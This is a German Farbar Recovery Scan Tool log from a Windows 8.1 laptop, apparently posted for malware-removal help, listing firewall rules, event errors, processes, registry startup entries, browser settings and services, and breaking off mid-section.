HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "hqghumeaylnlf.lnk"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\Run: => "CAHeadless"
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{290FEF21-DC28-4CDB-84A3-0CF48C59C53F}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe
FirewallRules: [{53F21F5D-793A-40CD-BE18-64DC327CAC74}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe
FirewallRules: [{9366E490-4066-453E-A63E-30D38D3C4385}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Video\VideoPlayer.exe
FirewallRules: [{957FF23A-1843-4C65-BBCF-377F30A37421}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{9FC26195-3C09-4CCF-91F4-496AAC3E0579}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{6F98C6CA-669A-49BB-A000-DCBC70357288}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{2E6F58D2-F1DA-40A7-B824-7BFBEC8C62F3}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{B82CCA82-236A-4606-B2A1-6683CE2BB5E1}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe
FirewallRules: [{710D6FB0-C282-43DE-94B6-5DA25FA840BA}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe
FirewallRules: [{B0B96A98-BB54-4416-95EF-A4FFA1D3E92A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{22649299-4229-4001-9C23-2C8EF0D021C6}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{75C220A7-7912-4649-96E4-1C6D42C27C3F}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{A945E41D-11DC-484D-A439-8F75665FF810}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{118DE993-AB64-4609-8043-8989F6E196A0}] => (Allow) C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe
FirewallRules: [{297E9E38-6323-4850-8793-890A4E1205BB}] => (Allow) C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe
FirewallRules: [{1BA61F3A-7C93-4D2E-B332-92CF5BE489EC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{DC615730-96FE-44BE-9092-C23B56CDB009}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{5F0C690B-51F3-4FFA-8EEE-C5829966CB9B}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe
FirewallRules: [{6F77C27B-B0FA-4B07-B15E-9913C71FC2BB}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe
FirewallRules: [{EFBAC9EC-6AAB-4AE6-88EE-873AD8ABC7E1}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe
FirewallRules: [{0D61EDDD-3DAD-4D0E-85F1-F7152ED3BEC4}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe
FirewallRules: [{55C9BFD4-E19A-4C09-A550-EA815A77F875}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{368618D4-80BD-47EC-B00A-554CCFD16ECC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{D5705000-430A-4DE7-B504-F3176E52BD62}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe
FirewallRules: [{10AAFB71-519E-4031-9E51-E38B666F3808}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe
FirewallRules: [{147C84EE-5F68-49BF-A093-CEBEEBD1F845}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe
FirewallRules: [{57FBBC48-338F-4339-B94A-B6F949FAE9E4}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe
FirewallRules: [{484626A6-A444-4833-BEAF-C493E3DB322D}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe
FirewallRules: [{80B4DFDA-F518-4EE4-A150-A2CD466AD4BD}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe
FirewallRules: [{479688D5-1CD3-4C96-8C3F-98DAA8676511}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe
FirewallRules: [{684F9EC8-CE62-45CF-8C0A-E600CB6770E5}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe
FirewallRules: [{2932FB41-9623-445B-B74C-AB39C41E41D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{FA7AD37A-61AE-4AC5-90E8-0ACB0E02C82A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{B8380D2E-28B4-4239-B1FC-E21AD7DB6507}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{0144819F-7C36-4E95-8468-A54663C763D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{682BEC69-6576-4675-9D34-3195707A8D30}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{A5EA98FB-B16F-4B86-B9F3-3F7B725FEA14}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{C2F25F89-9DFD-4DEF-B157-4A68AA57BEF1}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{40733857-3854-4F7D-ABAD-8839839E1CA3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{1AF1DCBF-BCE3-4798-B587-7124462DB377}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{AA88FEE8-E662-4ADE-9A23-27CD92A2A4C3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{217A8D6B-829D-4AE5-B0F9-93F9AD735CC2}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{0F2CD704-F53C-42B9-8565-E6AF5F373409}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{60A20179-977C-4925-BD45-186CC74D8B19}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{00ADB8FE-4D9E-4B3D-B9AB-6474FEB64908}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{01BD45EA-2486-4F1B-B219-B768D7AC80D4}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
FirewallRules: [{DA460DCD-D762-4AA5-81BD-338370077CB1}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
FirewallRules: [{95170546-A139-4F6A-B54E-110BAA90A507}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
FirewallRules: [{72068411-0556-4539-BC7C-535A80472C40}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
FirewallRules: [{C2658416-A2DF-4190-A1C5-4CFAAC757C0E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8588E4BB-3623-4737-ABB4-DEE15F85D85B}] => (Allow) C:\Users\Denny\AppData\Local\Chromium\Application\chrome.exe
==================== Wiederherstellungspunkte =========================
22-03-2016 02:55:07 JRT Pre-Junkware Removal
29-03-2016 12:45:27 Windows Modules Installer
==================== Fehlerhafte Geräte im Gerätemanager =============
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (03/29/2016 07:00:59 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 07:00:59 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 07:00:59 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 07:00:59 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 07:00:59 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 07:00:59 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 07:00:59 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 07:00:56 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 07:00:56 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Error: (03/29/2016 07:00:56 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
Systemfehler:
=============
Error: (03/29/2016 06:40:53 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Superfetch" wurde mit folgendem Fehler beendet:
%%1062
Error: (03/29/2016 06:40:35 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler:
%%1056
Error: (03/29/2016 06:40:06 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "DeleteFlag" aufgrund folgenden Fehlers fehlgeschlagen:
%%5
Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "Security" aufgrund folgenden Fehlers fehlgeschlagen:
%%5
Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "Security" aufgrund folgenden Fehlers fehlgeschlagen:
%%5
Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "Security" aufgrund folgenden Fehlers fehlgeschlagen:
%%5
Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: Der Aufruf "ScRegSetValueExW" ist für "Security" aufgrund folgenden Fehlers fehlgeschlagen:
%%5
Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Modules Installer" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "MBAMScheduler" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (03/29/2016 06:40:05 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "MBAMService" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
CodeIntegrity:
===================================
Date: 2016-01-27 20:34:50.024
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:33:27.259
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:32.120
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:31.842
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:21.532
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:21.366
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:19.557
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:13.438
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:00.333
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
Date: 2016-01-27 20:31:00.166
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\SpaceSoundPro\SpaceSoundPro.dll because the set of per-page image hashes could not be found on the system.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i5-3337U CPU @ 1.80GHz
Prozentuale Nutzung des RAM: 39%
Installierter physikalischer RAM: 3971.27 MB
Verfügbarer physikalischer RAM: 2383.73 MB
Summe virtueller Speicher: 8067.27 MB
Verfügbarer virtueller Speicher: 5881.53 MB
==================== Laufwerke ================================
Drive c: (Acer) (Fixed) (Total:449.11 GB) (Free:393.18 GB) NTFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 30743A9D)
Partition: GPT.
==================== Ende von Addition.txt ============================
Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01 durchgeführt von Denny (Administrator) auf SCHNEIDER (29-03-2016 19:05:29) Gestartet von C:\Users\Denny\Desktop Geladene Profile: Denny (Verfügbare Profile: Denny & Administrator) Platform: Windows 8.1 (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 11 (Standard-Browser nicht gefunden!) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (Intel Corporation) C:\Windows\System32\igfxCUIService.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe (Qualcomm Atheros Commnucations) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\AdminService.exe (Acer Incorporated) C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe (SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe (SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe (Acer Incorporate) C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe (Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamscheduler.exe (Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe (Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe (Copyright 2013 SAMSUNG) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe (Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe (Malwarebytes) C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbam.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Intel Corporation) C:\Windows\System32\igfxEM.exe (Intel Corporation) C:\Windows\System32\igfxHK.exe (Intel Corporation) C:\Windows\System32\igfxTray.exe (Adobe Systems Incorporated) C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe (Microsoft Corporation) C:\Windows\System32\SkyDrive.exe (Atheros Communications) C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE (Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe (Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe ==================== Registry (Nicht auf der Ausnahmeliste) =========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13449288 2013-03-26] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1278024 2013-03-08] (Realtek Semiconductor) HKLM\...\Run: [Samsung Link] => C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe [600928 2014-03-13] (Copyright 2013 SAMSUNG) HKLM\...\Run: [AdobeAAMUpdater-1.0] => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe" HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation) HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [619008 2010-05-25] (Nikon Corporation) HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2694040 2014-07-03] (Adobe Systems Incorporated) HKLM-x32\...\Run: [SunJavaUpdateSched] => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [807392 2016-03-21] (Avira Operations GmbH & Co. KG) HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\BtvStack.exe [132224 2013-02-28] (Atheros Communications) HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [718208 2010-03-16] (Microsoft Corporation) ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] () ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] () ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-06-25] () ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{CDCF1B09-7464-4C3E-A16A-C67E31D926EC}: [DhcpNameServer] 192.168.1.1 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=MSE1 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130926929970896047&GUID=91D7EFA7-E23E-4872-8361-CEB8ED36209E HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/ SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKLM-x32 -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> DefaultScope {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?} SearchScopes: HKU\S-1-5-21-1569062512-718196537-2772323438-1001 -> {8CB5941F-AEB6-4B8B-956E-95EBED73E3FE} URL = hxxps://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?} BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation) StartMenuInternet: IEXPLORE.EXE - iexplore.exe FireFox: ======== FF ProfilePath: C:\Users\Denny\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1 FF Homepage: hxxp://www.google.de/ FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2014-07-03] (Adobe Systems) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-02-18] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-02-18] (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-10-23] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-10-23] (Oracle Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-14] ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2014-07-03] (Adobe Systems) FF Extension: Default - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi [2016-03-16] [ist nicht signiert] Chrome: ======= CHR dev: Chrome dev build erkannt! <======= ACHTUNG CHR Profile: C:\Users\Denny\AppData\Local\Google\Chrome\User Data\Default StartMenuInternet: Google Chrome - chrome.exe ==================== Dienste (Nicht auf der Ausnahmeliste) ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 AdobeActiveFileMonitor13.0; C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe [231120 2014-08-31] (Adobe Systems Incorporated) S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [955736 2016-03-21] (Avira Operations GmbH & Co. KG) R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG) R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG) S2 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe [1424880 2016-03-21] (Avira Operations GmbH & Co. KG) R2 AtherosSvc; C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe [227968 2013-02-28] (Qualcomm Atheros Commnucations) [Datei ist nicht signiert] R2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe [2797312 2013-12-04] (Acer Incorporated) S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [660040 2013-01-18] (Acer Incorporated) R2 EpsonCustomerResearchParticipation; C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe [676336 2015-09-03] (SEIKO EPSON CORPORATION) R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation) R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation) R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128896 2013-02-18] (Intel Corporation) R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2013-02-18] (Intel Corporation) R2 LMSvc; C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe [431656 2013-03-15] (Acer Incorporate) R2 MBAMScheduler; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamscheduler.exe [1514464 2016-03-10] (Malwarebytes) R2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1136608 2016-03-10] (Malwarebytes) R2 Samsung Link Service; C:\Program Files\Samsung\Samsung Link\Samsung Link.exe [609632 2014-03-13] (Copyright 2013 SAMSUNG) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation) ===================== Treiber (Nicht auf 